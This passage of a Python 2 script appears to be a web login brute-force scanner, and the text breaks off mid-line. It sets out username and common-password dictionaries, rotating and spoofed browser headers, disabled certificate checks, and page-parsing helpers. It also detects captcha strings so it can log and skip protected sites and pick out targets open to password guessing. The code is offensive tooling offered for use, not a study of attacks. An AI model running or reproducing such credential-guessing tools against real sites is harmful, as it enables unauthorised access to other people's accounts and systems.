#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urlparse,hackhttp,time,requests,os,sys,re
import random,ssl,socket,urllib,chardet
import threading,datetime,Queue
from bs4 import BeautifulSoup as BS
USERNAME_DIC = ['admin','guest','test','ceshi','system']
PASSWORD_DIC = ['123456','admin','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2018','{user}2017','{user}2016','{user}2015','{user}!','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','a123456','p@ssw0rd','a123456789','woaini1314','qwerasdf','123456a','123456789a','987654321','qwer!@#$','5201314520', 'q123456', '123456abc', '123123123', '123456.','0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX','12345','1234567','passw0rd','admin888']
reload(sys)
sys.setdefaultencoding( "utf-8" )
requests.packages.urllib3.disable_warnings()
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
pass
else:
ssl._create_default_https_context = _create_unverified_https_context
lock = threading.Lock()
def requests_proxies():
'''
Proxies for every requests
'''
proxies = {
#'http':'127.0.0.1:8080',
#'https':'127.0.0.1:8080'
}
return proxies
def requests_headers():
'''
Random UA for every requests && Use cookie to scan
'''
user_agent = ['Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre',
'Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60','Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5']
UA = random.choice(user_agent)
headers = {
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0',
'Upgrade-Insecure-Requests':'1','Connection':'keep-alive','Cache-Control':'max-age=0',
'Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8',
"Referer": "http://www.baidu.com/link?url=www.so.com&url=www.soso.com&&url=www.sogou.com",
'Content-Type': 'application/x-www-form-urlencoded'}
return headers
def getCoding(strInput):
'''
获取编码格式
'''
if isinstance(strInput, unicode):
return "unicode"
try:
strInput.decode("utf8")
return 'utf8'
except:
pass
try:
strInput.decode("gbk")
return 'gbk'
except:
pass
def tran2UTF8(strInput):
'''
转化为utf8格式
'''
try:
strCodingFmt = getCoding(strInput)
if strCodingFmt == "utf8":
return strInput
elif strCodingFmt == "unicode":
return strInput.encode("utf8")
elif strCodingFmt == "gbk":
return strInput.decode("gbk").encode("utf8")
except:
return strInput
def url2ip(url):
'''
Url to ip
'''
ip = ''
try:
url = url.strip()
if not url.startswith("http"):
url = "http://" + url
handel_url = urlparse.urlparse(url).hostname
ip = socket.gethostbyname(handel_url)
except:
print '[!] Can not get ip'
pass
return ip
def get_header(url):
try:
print "Get http header:",url
if not url.startswith("http"):
url = "http://" + url
hh = hackhttp.hackhttp()
code, head, body, redirect, log = hh.http(url, headers=requests_headers())
print "Get header ok:", url
if log:
return log['response'].decode('utf-8', 'ignore').encode('utf-8')
else:
return False
except:
return False
def get_form_title(url):
url1 = url.strip()
header = {"Accept": "text/html,application/xhtml+xml,application/xml;",
"Accept-Encoding": "gzip",
"Accept-Language": "zh-CN,zh;q=0.8",
"Referer": "http://www.baidu.com/link?url=www.so.com&url=www.soso.com&&url=www.sogou.com",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
}
html = requests.get(url1, timeout=10, verify=False,headers=header).content
if re.search('gb2312', html):
html = html.decode('gbk', 'replace').encode('utf-8')
html =tran2UTF8(html)
# print html
all_soup = BS(html, "lxml")
yzms = ['验证码','点击更换','点击刷新']
for yzm in yzms:
if yzm in str(html):
print "\n\033[1;31m[ ",yzm,"in source:",url,']\033[0m\n',time.strftime('%Y-%m-%d %X', time.localtime(time.time()))
lock.acquire()
log = open(log_file,'a+')
log.write("??? "+yzm+" in source: "+url+'\n')
log.close()
lock.release()
return '',''
try:
title = all_soup.title.text
title = tran2UTF8(title)
except:
title = ''
# print title
result = re.findall(".*
